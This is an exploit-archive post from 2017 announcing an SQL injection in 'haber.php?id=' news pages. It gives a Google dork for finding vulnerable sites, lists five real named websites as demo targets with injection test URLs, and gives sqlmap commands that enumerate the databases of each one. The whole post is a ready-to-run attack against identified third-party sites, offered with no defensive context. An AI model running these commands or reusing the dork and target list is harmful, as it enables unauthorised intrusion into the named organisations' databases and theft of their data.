########################## # Exploit Title: Turkish Haber SQL Injection # Google Dork : inurl:"haber.php?id=" # Discovered By:Alperen Keskin # Tested on : Windows10 & Kali Linux & Linux Mint # Date:25.01.2017 ########################## ## [Demo] http://veteriner.org.tr/tr/haber.php?id=105' http://turbosurucukursu.com.tr/haber.php?id=132' http://www.intermobil.com.tr/haber.php?id=13' http://www.martutkimya.com/haber.php?id=1 http://www.isarod.org/haber.php?id=480 ## [Sqlmap Using] sqlmap -u http://veteriner.org.tr/tr/haber.php?id=105 --dbs sqlmap -u http://turbosurucukursu.com.tr/haber.php?id=132 --dbs sqlmap -u http://www.intermobil.com.tr/haber.php?id=13 --dbs sqlmap -u http://www.martutkimya.com/haber.php?id=1 --dbs sqlmap -u http://www.isarod.org/haber.php?id=480 --dbs ########################### # https://www.youtube.com/channel/UCCzpvX3ly5o2IUslqgMpLHg/featured # Alperen Keskin